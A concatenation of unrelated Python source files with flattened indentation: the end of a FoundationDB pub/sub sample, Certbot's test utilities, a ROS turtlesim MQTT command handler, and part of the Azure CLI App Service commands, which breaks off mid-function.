get_and_print_inbox_messages(inbox)
changed = (latest != inbox.latest_message)
latest = inbox.latest_message
if not changed and waited > wait_limit:
break
waited += wait_inc
time.sleep(wait_inc)
# Generate and run a thread for each feed and each inbox.
def run_threads(feed_map, inbox_map, messages):
feed_threads = [threading.Thread(target=feed_driver, args=(feed_map[id], messages))
for id in feed_map]
inbox_threads = [threading.Thread(target=inbox_driver, args=(inbox_map[id],))
for id in inbox_map]
for f in feed_threads:
f.start()
for i in inbox_threads:
i.start()
for f in feed_threads:
f.join()
for i in inbox_threads:
i.join()
def sample_pubsub(feeds, inboxes, messages):
feed_map, inbox_map = setup_topology(feeds, inboxes)
run_threads(feed_map, inbox_map, messages)
if __name__ == "__main__":
import random
import threading
import time
import fdb
fdb.api_version(22)
db = fdb.open()
ps = PubSub(db)
ps.clear_all_messages()
sample_pubsub(3, 3, 3)
|
util.py
|
"""Test utilities.
.. warning:: This module is not part of the public API.
"""
import logging
import shutil
import sys
import tempfile
import unittest
from multiprocessing import Process, Event
import OpenSSL
import josepy as jose
import mock
import pkg_resources
import six
from six.moves import reload_module # pylint: disable=import-error
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import serialization
from certbot import configuration
from certbot import constants
from certbot import interfaces
from certbot import lock
from certbot import storage
from certbot import util
from certbot.compat import os
from certbot.compat import filesystem
from certbot.display import util as display_util
def vector_path(*names):
"""Path to a test vector."""
return pkg_resources.resource_filename(
__name__, os.path.join('testdata', *names))
def load_vector(*names):
"""Load contents of a test vector."""
# luckily, resource_string opens file in binary mode
data = pkg_resources.resource_string(
__name__, os.path.join('testdata', *names))
    # Try to convert CRLF to LF when the data is text
try:
return data.decode().replace('\r\n', '\n').encode()
except ValueError:
# Failed to process the file with standard encoding.
# Most likely not a text file, return its bytes untouched.
return data
def _guess_loader(filename, loader_pem, loader_der):
_, ext = os.path.splitext(filename)
if ext.lower() == '.pem':
return loader_pem
elif ext.lower() == '.der':
return loader_der
else: # pragma: no cover
raise ValueError("Loader could not be recognized based on extension")
def load_cert(*names):
"""Load certificate."""
loader = _guess_loader(
names[-1], OpenSSL.crypto.FILETYPE_PEM, OpenSSL.crypto.FILETYPE_ASN1)
return OpenSSL.crypto.load_certificate(loader, load_vector(*names))
def load_csr(*names):
"""Load certificate request."""
loader = _guess_loader(
names[-1], OpenSSL.crypto.FILETYPE_PEM, OpenSSL.crypto.FILETYPE_ASN1)
return OpenSSL.crypto.load_certificate_request(loader, load_vector(*names))
def load_comparable_csr(*names):
"""Load ComparableX509 certificate request."""
return jose.ComparableX509(load_csr(*names))
def load_rsa_private_key(*names):
"""Load RSA private key."""
loader = _guess_loader(names[-1], serialization.load_pem_private_key,
serialization.load_der_private_key)
return jose.ComparableRSAKey(loader(
load_vector(*names), password=None, backend=default_backend()))
def load_pyopenssl_private_key(*names):
"""Load pyOpenSSL private key."""
loader = _guess_loader(
names[-1], OpenSSL.crypto.FILETYPE_PEM, OpenSSL.crypto.FILETYPE_ASN1)
return OpenSSL.crypto.load_privatekey(loader, load_vector(*names))
def make_lineage(config_dir, testfile):
"""Creates a lineage defined by testfile.
This creates the archive, live, and renewal directories if
necessary and creates a simple lineage.
:param str config_dir: path to the configuration directory
:param str testfile: configuration file to base the lineage on
:returns: path to the renewal conf file for the created lineage
:rtype: str
"""
lineage_name = testfile[:-len('.conf')]
conf_dir = os.path.join(
config_dir, constants.RENEWAL_CONFIGS_DIR)
archive_dir = os.path.join(
config_dir, constants.ARCHIVE_DIR, lineage_name)
live_dir = os.path.join(
config_dir, constants.LIVE_DIR, lineage_name)
for directory in (archive_dir, conf_dir, live_dir,):
if not os.path.exists(directory):
filesystem.makedirs(directory)
sample_archive = vector_path('sample-archive')
for kind in os.listdir(sample_archive):
shutil.copyfile(os.path.join(sample_archive, kind),
os.path.join(archive_dir, kind))
for kind in storage.ALL_FOUR:
os.symlink(os.path.join(archive_dir, '{0}1.pem'.format(kind)),
os.path.join(live_dir, '{0}.pem'.format(kind)))
conf_path = os.path.join(config_dir, conf_dir, testfile)
with open(vector_path(testfile)) as src:
with open(conf_path, 'w') as dst:
dst.writelines(
line.replace('MAGICDIR', config_dir) for line in src)
return conf_path
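# Hedged usage sketch (illustration only). 'sample-renewal.conf' is a hypothetical
# test vector name; any renewal configuration file under testdata/ ending in '.conf'
# works. Typically called from a ConfigTestCase, so config_dir already exists.
#
#   renewal_conf = make_lineage(self.config.config_dir, 'sample-renewal.conf')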
def patch_get_utility(target='zope.component.getUtility'):
"""Patch zope.component.getUtility to use a special mock IDisplay.
    The mock IDisplay works like a regular mock object, except it also
    asserts that methods are called with valid arguments.
:param str target: path to patch
:returns: mock zope.component.getUtility
:rtype: mock.MagicMock
"""
return mock.patch(target, new_callable=_create_get_utility_mock)
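# Hedged usage sketch (illustration only): the patch is commonly applied as a test
# decorator, and the mocked IDisplay methods can have their return values set even
# though the mock itself is frozen.
#
#   @patch_get_utility()
#   def test_prompt(self, mock_get_utility):
#       mock_get_utility().yesno.return_value = True
#       ...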
def patch_get_utility_with_stdout(target='zope.component.getUtility',
stdout=None):
"""Patch zope.component.getUtility to use a special mock IDisplay.
    The mock IDisplay works like a regular mock object, except it also
    asserts that methods are called with valid arguments.
The `message` argument passed to the IDisplay methods is passed to
stdout's write method.
:param str target: path to patch
:param object stdout: object to write standard output to; it is
expected to have a `write` method
:returns: mock zope.component.getUtility
:rtype: mock.MagicMock
"""
stdout = stdout if stdout else six.StringIO()
freezable_mock = _create_get_utility_mock_with_stdout(stdout)
return mock.patch(target, new=freezable_mock)
class FreezableMock(object):
"""Mock object with the ability to freeze attributes.
This class works like a regular mock.MagicMock object, except
attributes and behavior set before the object is frozen cannot
be changed during tests.
If a func argument is provided to the constructor, this function
is called first when an instance of FreezableMock is called,
followed by the usual behavior defined by MagicMock. The return
value of func is ignored.
"""
def __init__(self, frozen=False, func=None, return_value=mock.sentinel.DEFAULT):
self._frozen_set = set() if frozen else {'freeze', }
self._func = func
self._mock = mock.MagicMock()
if return_value != mock.sentinel.DEFAULT:
self.return_value = return_value
self._frozen = frozen
def freeze(self):
"""Freeze object preventing further changes."""
self._frozen = True
def __call__(self, *args, **kwargs):
if self._func is not None:
self._func(*args, **kwargs)
return self._mock(*args, **kwargs)
def __getattribute__(self, name):
if name == '_frozen':
try:
return object.__getattribute__(self, name)
except AttributeError:
return False
elif name in ('return_value', 'side_effect',):
return getattr(object.__getattribute__(self, '_mock'), name)
elif name == '_frozen_set' or name in self._frozen_set:
return object.__getattribute__(self, name)
else:
return getattr(object.__getattribute__(self, '_mock'), name)
def __setattr__(self, name, value):
""" Before it is frozen, attributes are set on the FreezableMock
instance and added to the _frozen_set. Attributes in the _frozen_set
cannot be changed after the FreezableMock is frozen. In this case,
they are set on the underlying _mock.
In cases of return_value and side_effect, these attributes are always
passed through to the instance's _mock and added to the _frozen_set
before the object is frozen.
"""
if self._frozen:
if name in self._frozen_set:
raise AttributeError('Cannot change frozen attribute ' + name)
else:
return setattr(self._mock, name, value)
if name != '_frozen_set':
self._frozen_set.add(name)
if name in ('return_value', 'side_effect'):
return setattr(self._mock, name, value)
return object.__setattr__(self, name, value)
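# Hedged usage sketch (illustration only) of the freezing behavior described in the
# class docstring:
#
#   display = FreezableMock()
#   display.greeting = 'hello'   # set before freezing, so the attribute is protected
#   display.freeze()
#   display.greeting = 'bye'     # raises AttributeError: attribute is frozen
#   display.anything_else('ok')  # unknown names fall through to the inner MagicMock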
def _create_get_utility_mock():
display = FreezableMock()
# Use pylint code for disable to keep on single line under line length limit
for name in interfaces.IDisplay.names(): # pylint: disable=no-member,E1120
if name != 'notification':
frozen_mock = FreezableMock(frozen=True, func=_assert_valid_call)
setattr(display, name, frozen_mock)
display.freeze()
return FreezableMock(frozen=True, return_value=display)
def _create_get_utility_mock_with_stdout(stdout):
def _write_msg(message, *unused_args, **unused_kwargs):
"""Write to message to stdout.
"""
if message:
stdout.write(message)
def mock_method(*args, **kwargs):
"""
Mock function for IDisplay methods.
"""
_assert_valid_call(args, kwargs)
_write_msg(*args, **kwargs)
display = FreezableMock()
# Use pylint code for disable to keep on single line under line length limit
for name in interfaces.IDisplay.names(): # pylint: disable=no-member,E1120
if name == 'notification':
frozen_mock = FreezableMock(frozen=True,
func=_write_msg)
setattr(display, name, frozen_mock)
else:
frozen_mock = FreezableMock(frozen=True,
func=mock_method)
setattr(display, name, frozen_mock)
display.freeze()
return FreezableMock(frozen=True, return_value=display)
def _assert_valid_call(*args, **kwargs):
assert_args = [args[0] if args else kwargs['message']]
assert_kwargs = {}
assert_kwargs['default'] = kwargs.get('default', None)
assert_kwargs['cli_flag'] = kwargs.get('cli_flag', None)
assert_kwargs['force_interactive'] = kwargs.get('force_interactive', False)
display_util.assert_valid_call(*assert_args, **assert_kwargs)
class TempDirTestCase(unittest.TestCase):
"""Base test class which sets up and tears down a temporary directory"""
def setUp(self):
"""Execute before test"""
self.tempdir = tempfile.mkdtemp()
def tearDown(self):
"""Execute after test"""
# Cleanup opened resources after a test. This is usually done through atexit handlers in
# Certbot, but during tests, atexit will not run registered functions before tearDown is
# called and instead will run them right before the entire test process exits.
        # This is a problem on Windows, which does not allow files to be removed while they are still open.
logging.shutdown()
# Remove logging handlers that have been closed so they won't be
# accidentally used in future tests.
logging.getLogger().handlers = []
util._release_locks() # pylint: disable=protected-access
shutil.rmtree(self.tempdir)
class ConfigTestCase(TempDirTestCase):
"""Test class which sets up a NamespaceConfig object."""
def setUp(self):
super(ConfigTestCase, self).setUp()
self.config = configuration.NamespaceConfig(
mock.MagicMock(**constants.CLI_DEFAULTS)
)
self.config.verb = "certonly"
self.config.config_dir = os.path.join(self.tempdir, 'config')
self.config.work_dir = os.path.join(self.tempdir, 'work')
self.config.logs_dir = os.path.join(self.tempdir, 'logs')
self.config.cert_path = constants.CLI_DEFAULTS['auth_cert_path']
self.config.fullchain_path = constants.CLI_DEFAULTS['auth_chain_path']
self.config.chain_path = constants.CLI_DEFAULTS['auth_chain_path']
self.config.server = "https://example.com"
def _handle_lock(event_in, event_out, path):
"""
Acquire a file lock on given path, then wait to release it. This worker is coordinated
using events to signal when the lock should be acquired and released.
:param multiprocessing.Event event_in: event object to signal when to release the lock
:param multiprocessing.Event event_out: event object to signal when the lock is acquired
:param path: the path to lock
"""
if os.path.isdir(path):
my_lock = lock.lock_dir(path)
else:
my_lock = lock.LockFile(path)
try:
event_out.set()
assert event_in.wait(timeout=20), 'Timeout while waiting to release the lock.'
finally:
my_lock.release()
def lock_and_call(callback, path_to_lock):
"""
Grab a lock on path_to_lock from a foreign process then execute the callback.
:param callable callback: object to call after acquiring the lock
:param str path_to_lock: path to file or directory to lock
"""
# Reload certbot.util module to reset internal _LOCKS dictionary.
reload_module(util)
emit_event = Event()
receive_event = Event()
process = Process(target=_handle_lock, args=(emit_event, receive_event, path_to_lock))
process.start()
# Wait confirmation that lock is acquired
assert receive_event.wait(timeout=10), 'Timeout while waiting to acquire the lock.'
# Execute the callback
callback()
# Trigger unlock from foreign process
emit_event.set()
# Wait for process termination
process.join(timeout=10)
assert process.exitcode == 0
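# Illustrative sketch (not part of the original helpers): lock_and_call runs the callback
# while a separate worker process holds the lock on the given path, which is how tests
# exercise Certbot's behavior when its directories are already locked by another instance.
def _example_lock_and_call(path):
    def callback():
        # For the duration of this call, `path` is locked by the worker process, so any
        # code under test that tries to acquire the same lock from here should fail cleanly.
        assert os.path.exists(path)
    lock_and_call(callback, path)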
def skip_on_windows(reason):
"""Decorator to skip permanently a test on Windows. A reason is required."""
def wrapper(function):
"""Wrapped version"""
return unittest.skipIf(sys.platform == 'win32', reason)(function)
return wrapper
def temp_join(path):
"""
Return the given path joined to the tempdir path for the current platform
Eg.: 'cert' => /tmp/cert (Linux) or 'C:\\Users\\currentuser\\AppData\\Temp\\cert' (Windows)
"""
return os.path.join(tempfile.gettempdir(), path)
command_sender.py
# -*- coding: utf-8 -*-
import os
import re
import ssl
import threading
from math import pi
import rospy
from geometry_msgs.msg import Twist
import paho.mqtt.client as mqtt
from fiware_ros_turtlesim.params import getParams, findItem
from fiware_ros_turtlesim.logging import getLogger
logger = getLogger(__name__)
class CommandSender(object):
def __init__(self, node_name):
self.node_name = node_name
self.__client = mqtt.Client(protocol=mqtt.MQTTv311)
self.__client.on_connect = self._on_connect
self.__client.on_message = self._on_message
rospy.on_shutdown(self._do_stop)
rospy.on_shutdown(self.__client.disconnect)
rospy.on_shutdown(self.__client.loop_stop)
self._params = getParams(rospy.get_param("~"))
topic = findItem(self._params.ros.topics, 'key', 'turtlesim')
self.__ros_pub = rospy.Publisher(topic.name, Twist, queue_size=10)
self.__do_move = False
self.__lock = threading.Lock()
self._cmd_payload_re = re.compile(findItem(self._params.mqtt.topics, 'key', 'command_sender').re)
def connect(self):
logger.infof('Connect mqtt broker')
if hasattr(self._params.mqtt, 'cafile'):
cafile_path = self._params.mqtt.cafile.strip()
if len(cafile_path) > 0 and os.path.isfile(cafile_path):
self.__client.tls_set(cafile_path, tls_version=ssl.PROTOCOL_TLSv1_2)
if hasattr(self._params.mqtt, 'username') and hasattr(self._params.mqtt, 'password'):
username = self._params.mqtt.username.strip()
password = self._params.mqtt.password.strip()
if len(username) > 0 and len(password) > 0:
self.__client.username_pw_set(username, password)
self.__client.connect(self._params.mqtt.host, port=self._params.mqtt.port, keepalive=60)
self.__client.loop_start()
return self
def start(self):
logger.infof('CommandSender start : {}', self.node_name)
rospy.spin()
logger.infof('CommandSender stop : {}', self.node_name)
def nodetest(self):
from collections import namedtuple
logger.warnf('Test publish using publishtest of rostest')
r = rospy.Rate(0.5)
while not rospy.is_shutdown():
self._on_message(None, None, namedtuple('msg', ('payload',))(payload='device_id@move|circle'))
r.sleep()
def _on_connect(self, client, userdata, flags, response_code):
logger.infof('mqtt connect status={}', response_code)
client.subscribe(findItem(self._params.mqtt.topics, 'key', 'command_sender').name)
def _on_message(self, client, userdata, msg):
payload = str(msg.payload)
logger.infof('received message from mqtt: {}', payload)
matcher = self._cmd_payload_re.match(payload)
if matcher:
cmd = matcher.group('cmd')
device_id = matcher.group('device_id')
if cmd == 'circle':
self._do_circle()
elif cmd == 'square':
self._do_square()
elif cmd == 'triangle':
self._do_triangle()
elif cmd == 'cross':
self._do_stop()
elif cmd == 'up':
self._do_forward()
elif cmd == 'down':
self._do_backward()
elif cmd == 'left':
self._do_turnleft()
elif cmd == 'right':
self._do_turnright()
else:
logger.warnf('unknown cmd: {}', payload)
cmd = 'UNKNOWN CMD: {}'.format(cmd)
topic = findItem(self._params.mqtt.topics, 'key', 'command_sender_exec').name
fmt = findItem(self._params.mqtt.topics, 'key', 'command_sender_exec').format
self.__client.publish(topic, fmt.format(device_id=device_id, cmd=cmd))
else:
            logger.warnf('unknown payload: {}', payload)
        logger.debugf('active threads = {}', threading.active_count())
def _do_circle(self):
logger.infof('do circle')
def move(self):
self.__circle(int(2 * pi * self._params.ros.rate))
return self._do_move(move)
def _do_square(self):
logger.infof('do square')
def move(self):
self.__linear(2 * self._params.ros.rate)
self.__rotate(pi / 2)
self.__linear(2 * self._params.ros.rate)
self.__rotate(pi / 2)
self.__linear(2 * self._params.ros.rate)
self.__rotate(pi / 2)
self.__linear(2 * self._params.ros.rate)
self.__rotate(pi / 2)
return self._do_move(move)
def _do_triangle(self):
logger.infof('do triangle')
def move(self):
self.__linear(2 * self._params.ros.rate)
self.__rotate(pi * 2 / 3)
self.__linear(2 * self._params.ros.rate)
self.__rotate(pi * 2 / 3)
self.__linear(2 * self._params.ros.rate)
self.__rotate(pi * 2 / 3)
return self._do_move(move)
def _do_forward(self):
logger.infof('do forward')
def move(self):
self.__linear(int(self._params.ros.rate * 0.2))
return self._do_move(move)
def _do_backward(self):
logger.infof('do backward')
def move(self):
self.__linear(int(self._params.ros.rate * 0.2), reverse=True)
return self._do_move(move)
def _do_turnleft(self):
logger.infof('do turn left')
def move(self):
self.__rotate(pi / 16)
return self._do_move(move)
def _do_turnright(self):
logger.infof('do turn right')
def move(self):
self.__rotate(pi / 16, reverse=True)
return self._do_move(move)
def _do_stop(self):
with self.__lock:
self.__do_move = False
        logger.infof('stop moving')
def _do_move(self, callback):
def func():
if not callable(callback):
return
if self.__do_move:
logger.infof('now moving')
return
with self.__lock:
self.__do_move = True
callback(self)
with self.__lock:
self.__do_move = False
thread = threading.Thread(target=func)
thread.start()
return thread
def __circle(self, ticks):
move_cmd = Twist()
move_cmd.linear.x = 1.0
move_cmd.angular.z = 1.0
self.__move(ticks, move_cmd)
def __linear(self, ticks, reverse=False):
move_cmd = Twist()
move_cmd.linear.x = 1.0 if not reverse else -1.0
self.__move(ticks, move_cmd)
def __rotate(self, angle, reverse=False):
move_cmd = Twist()
move_cmd.angular.z = 1.0 if not reverse else -1.0
ticks = int(angle * self._params.ros.rate)
self.__move(ticks, move_cmd)
def __move(self, ticks, move_cmd):
r = rospy.Rate(self._params.ros.rate)
for t in range(ticks):
if not self.__do_move:
break
self.__ros_pub.publish(move_cmd)
r.sleep()
self.__ros_pub.publish(Twist())
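# Illustrative sketch (not part of the original module): typical wiring of this class as a
# ROS node. The node name and the rosparam layout are assumptions here; the project's
# actual entry point may live in a separate launch script.
if __name__ == '__main__':
    rospy.init_node('command_sender')
    CommandSender('command_sender').connect().start()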
custom.py
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from __future__ import print_function
import threading
import time
try:
from urllib.parse import urlparse
except ImportError:
from urlparse import urlparse # pylint: disable=import-error
from six.moves.urllib.request import urlopen # pylint: disable=import-error, ungrouped-imports
from binascii import hexlify
from os import urandom
import ast
import json
import ssl
import sys
import OpenSSL.crypto
from fabric import Connection
from knack.prompting import prompt_pass, NoTTYException
from knack.util import CLIError
from knack.log import get_logger
from msrestazure.azure_exceptions import CloudError
from msrestazure.tools import is_valid_resource_id, parse_resource_id
from azure.mgmt.storage import StorageManagementClient
from azure.mgmt.web.models import (Site, SiteConfig, User, AppServicePlan, SiteConfigResource,
SkuDescription, SslState, HostNameBinding, NameValuePair,
BackupRequest, DatabaseBackupSetting, BackupSchedule,
RestoreRequest, FrequencyUnit, Certificate, HostNameSslState,
RampUpRule, UnauthenticatedClientAction, ManagedServiceIdentity,
DeletedAppRestoreRequest, DefaultErrorResponseException,
SnapshotRestoreRequest, SnapshotRecoverySource)
from azure.mgmt.applicationinsights import ApplicationInsightsManagementClient
from azure.mgmt.web.models import VnetInfo
from azure.mgmt.web.models import SwiftVirtualNetwork
from azure.mgmt.resource.resources.models import GenericResource
from azure.cli.core.commands.client_factory import get_mgmt_service_client
from azure.cli.core.commands.client_factory import get_subscription_id
from azure.cli.command_modules.network._client_factory import network_client_factory
from azure.cli.command_modules.resource._client_factory import (
_resource_client_factory, _resource_policy_client_factory, _resource_lock_client_factory,
_resource_links_client_factory, _authorization_management_client, _resource_managedapps_client_factory)
from azure.cli.core.commands import LongRunningOperation
from azure.cli.core.util import in_cloud_console, shell_safe_json_parse, open_page_in_browser, get_json_object
from .tunnel import TunnelServer
from azure.cli.core.profiles import ResourceType
from azure.cli.core.util import in_cloud_console
from azure.cli.core.util import open_page_in_browser
from .vsts_cd_provider import VstsContinuousDeliveryProvider
from ._params import AUTH_TYPES, MULTI_CONTAINER_TYPES, LINUX_RUNTIMES, WINDOWS_RUNTIMES
from ._client_factory import web_client_factory, ex_handler_factory
from ._appservice_utils import _generic_site_operation
from ._create_util import (zip_contents_from_dir, get_runtime_version_details, create_resource_group,
should_create_new_rg, set_location, should_create_new_asp, should_create_new_app,
get_lang_from_content)
from ._constants import (NODE_RUNTIME_NAME, OS_DEFAULT, STATIC_RUNTIME_NAME, PYTHON_RUNTIME_NAME)
from azure.cli.command_modules.relay._client_factory import namespaces_mgmt_client_factory, \
wcfrelays_mgmt_client_factory, hycos_mgmt_client_factory
from azure.mgmt.web.models import HybridConnection
from azure.mgmt.network.models import Subnet
from azure.mgmt.relay.models import AccessRights
logger = get_logger(__name__)
# pylint:disable=no-member,too-many-lines,too-many-locals
# region "Common routines shared with quick-start extensions."
# Please maintain compatibility in both interfaces and functionalities.
def create_webapp(cmd, resource_group_name, name, plan, runtime=None, startup_file=None, # pylint: disable=too-many-statements
deployment_container_image_name=None, deployment_source_url=None, deployment_source_branch='master',
deployment_local_git=None, multicontainer_config_type=None, multicontainer_config_file=None,
tags=None):
if deployment_source_url and deployment_local_git:
raise CLIError('usage error: --deployment-source-url <url> | --deployment-local-git')
client = web_client_factory(cmd.cli_ctx)
if is_valid_resource_id(plan):
parse_result = parse_resource_id(plan)
plan_info = client.app_service_plans.get(parse_result['resource_group'], parse_result['name'])
else:
plan_info = client.app_service_plans.get(resource_group_name, plan)
if not plan_info:
raise CLIError("The plan '{}' doesn't exist".format(plan))
is_linux = plan_info.reserved
node_default_version = '8.11.1'
location = plan_info.location
site_config = SiteConfig(app_settings=[])
webapp_def = Site(location=location, site_config=site_config, server_farm_id=plan_info.id, tags=tags)
helper = _StackRuntimeHelper(client, linux=is_linux)
if is_linux:
if not validate_container_app_create_options(runtime, deployment_container_image_name,
multicontainer_config_type, multicontainer_config_file):
raise CLIError("usage error: --runtime | --deployment-container-image-name |"
" --multicontainer-config-type TYPE --multicontainer-config-file FILE")
if startup_file:
site_config.app_command_line = startup_file
if runtime:
site_config.linux_fx_version = runtime
match = helper.resolve(runtime)
if not match:
raise CLIError("Linux Runtime '{}' is not supported."
"Please invoke 'list-runtimes' to cross check".format(runtime))
elif deployment_container_image_name:
site_config.linux_fx_version = _format_fx_version(deployment_container_image_name)
site_config.app_settings.append(NameValuePair(name="WEBSITES_ENABLE_APP_SERVICE_STORAGE",
value="false"))
elif multicontainer_config_type and multicontainer_config_file:
encoded_config_file = _get_linux_multicontainer_encoded_config_from_file(multicontainer_config_file)
site_config.linux_fx_version = _format_fx_version(encoded_config_file, multicontainer_config_type)
elif plan_info.is_xenon: # windows container webapp
site_config.windows_fx_version = _format_fx_version(deployment_container_image_name)
elif runtime: # windows webapp with runtime specified
if any([startup_file, deployment_container_image_name, multicontainer_config_file, multicontainer_config_type]):
raise CLIError("usage error: --startup-file or --deployment-container-image-name or "
"--multicontainer-config-type and --multicontainer-config-file is "
"only appliable on linux webapp")
match = helper.resolve(runtime)
if not match:
raise CLIError("Runtime '{}' is not supported. Please invoke 'list-runtimes' to cross check".format(runtime)) # pylint: disable=line-too-long
match['setter'](match, site_config)
        # Be consistent with portal: any windows webapp should have this even if it doesn't have node in the stack
if not match['displayName'].startswith('node'):
site_config.app_settings.append(NameValuePair(name="WEBSITE_NODE_DEFAULT_VERSION",
value=node_default_version))
else: # windows webapp without runtime specified
site_config.app_settings.append(NameValuePair(name="WEBSITE_NODE_DEFAULT_VERSION",
value=node_default_version))
if site_config.app_settings:
for setting in site_config.app_settings:
logger.info('Will set appsetting %s', setting)
poller = client.web_apps.create_or_update(resource_group_name, name, webapp_def)
webapp = LongRunningOperation(cmd.cli_ctx)(poller)
# Ensure SCC operations follow right after the 'create', no precedent appsetting update commands
_set_remote_or_local_git(cmd, webapp, resource_group_name, name, deployment_source_url,
deployment_source_branch, deployment_local_git)
_fill_ftp_publishing_url(cmd, webapp, resource_group_name, name)
return webapp
def validate_container_app_create_options(runtime=None, deployment_container_image_name=None,
multicontainer_config_type=None, multicontainer_config_file=None):
if bool(multicontainer_config_type) != bool(multicontainer_config_file):
return False
opts = [runtime, deployment_container_image_name, multicontainer_config_type]
    return len([x for x in opts if x]) == 1  # only one of these option combinations may be specified
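# Illustrative sketch (not part of the original module): exactly one container source may
# be given, either a runtime, an image name, or the multicontainer type/file pair. The
# runtime and image values below are hypothetical.
def _example_container_create_options():
    assert validate_container_app_create_options(runtime='node|10.1')
    assert validate_container_app_create_options(deployment_container_image_name='nginx')
    assert validate_container_app_create_options(multicontainer_config_type='COMPOSE',
                                                 multicontainer_config_file='docker-compose.yml')
    # rejected: two sources at once, or a multicontainer type without its file
    assert not validate_container_app_create_options(runtime='node|10.1',
                                                     deployment_container_image_name='nginx')
    assert not validate_container_app_create_options(multicontainer_config_type='COMPOSE')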
def update_app_settings(cmd, resource_group_name, name, settings=None, slot=None, slot_settings=None):
if not settings and not slot_settings:
        raise CLIError('Usage Error: --settings | --slot-settings')
settings = settings or []
slot_settings = slot_settings or []
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_application_settings', slot)
result, slot_result = {}, {}
# pylint: disable=too-many-nested-blocks
for src, dest in [(settings, result), (slot_settings, slot_result)]:
for s in src:
try:
temp = shell_safe_json_parse(s)
                if isinstance(temp, list):  # a bit messy, but we'd like to accept the output of the "list" command
for t in temp:
if t.get('slotSetting', True):
slot_result[t['name']] = t['value']
else:
result[t['name']] = t['value']
else:
dest.update(temp)
except CLIError:
setting_name, value = s.split('=', 1)
dest[setting_name] = value
result.update(slot_result)
for setting_name, value in result.items():
app_settings.properties[setting_name] = value
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_application_settings',
app_settings.properties, slot, client)
app_settings_slot_cfg_names = []
if slot_result:
new_slot_setting_names = slot_result.keys()
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.app_setting_names = slot_cfg_names.app_setting_names or []
slot_cfg_names.app_setting_names += new_slot_setting_names
app_settings_slot_cfg_names = slot_cfg_names.app_setting_names
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return _build_app_settings_output(result.properties, app_settings_slot_cfg_names)
def add_azure_storage_account(cmd, resource_group_name, name, custom_id, storage_type, account_name,
share_name, access_key, mount_path=None, slot=None, slot_setting=False):
from azure.mgmt.web.models import AzureStorageInfoValue
azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
if custom_id in azure_storage_accounts.properties:
raise CLIError("Site already configured with an Azure storage account with the id '{}'. "
"Use 'az webapp config storage-account update' to update an existing "
"Azure storage account configuration.".format(custom_id))
azure_storage_accounts.properties[custom_id] = AzureStorageInfoValue(type=storage_type, account_name=account_name,
share_name=share_name, access_key=access_key,
mount_path=mount_path)
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts.properties,
slot, client)
if slot_setting:
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.azure_storage_config_names = slot_cfg_names.azure_storage_config_names or []
if custom_id not in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.append(custom_id)
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
def update_azure_storage_account(cmd, resource_group_name, name, custom_id, storage_type=None, account_name=None,
share_name=None, access_key=None, mount_path=None, slot=None, slot_setting=False):
from azure.mgmt.web.models import AzureStorageInfoValue
azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
existing_account_config = azure_storage_accounts.properties.pop(custom_id, None)
if not existing_account_config:
raise CLIError("No Azure storage account configuration found with the id '{}'. "
"Use 'az webapp config storage-account add' to add a new "
"Azure storage account configuration.".format(custom_id))
new_account_config = AzureStorageInfoValue(
type=storage_type or existing_account_config.type,
account_name=account_name or existing_account_config.account_name,
share_name=share_name or existing_account_config.share_name,
access_key=access_key or existing_account_config.access_key,
mount_path=mount_path or existing_account_config.mount_path
)
azure_storage_accounts.properties[custom_id] = new_account_config
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts.properties,
slot, client)
if slot_setting:
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.azure_storage_config_names = slot_cfg_names.azure_storage_config_names or []
if custom_id not in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.append(custom_id)
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
def enable_zip_deploy(cmd, resource_group_name, name, src, timeout=None, slot=None):
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
zip_url = scm_url + '/api/zipdeploy?isAsync=true'
deployment_status_url = scm_url + '/api/deployments/latest'
import urllib3
authorization = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
headers = authorization
headers['content-type'] = 'application/octet-stream'
import requests
import os
# Read file content
with open(os.path.realpath(os.path.expanduser(src)), 'rb') as fs:
zip_content = fs.read()
requests.post(zip_url, data=zip_content, headers=headers)
# check the status of async deployment
response = _check_zip_deployment_status(deployment_status_url, authorization, timeout)
return response
def get_sku_name(tier): # pylint: disable=too-many-return-statements
tier = tier.upper()
if tier == 'F1' or tier == "FREE":
return 'FREE'
elif tier == 'D1' or tier == "SHARED":
return 'SHARED'
elif tier in ['B1', 'B2', 'B3', 'BASIC']:
return 'BASIC'
elif tier in ['S1', 'S2', 'S3']:
return 'STANDARD'
elif tier in ['P1', 'P2', 'P3']:
return 'PREMIUM'
elif tier in ['P1V2', 'P2V2', 'P3V2']:
return 'PREMIUMV2'
elif tier in ['PC2', 'PC3', 'PC4']:
return 'PremiumContainer'
elif tier in ['EP1', 'EP2', 'EP3']:
return 'ElasticPremium'
else:
raise CLIError("Invalid sku(pricing tier), please refer to command help for valid values")
def _generic_settings_operation(cli_ctx, resource_group_name, name, operation_name,
setting_properties, slot=None, client=None):
client = client or web_client_factory(cli_ctx)
operation = getattr(client.web_apps, operation_name if slot is None else operation_name + '_slot')
if slot is None:
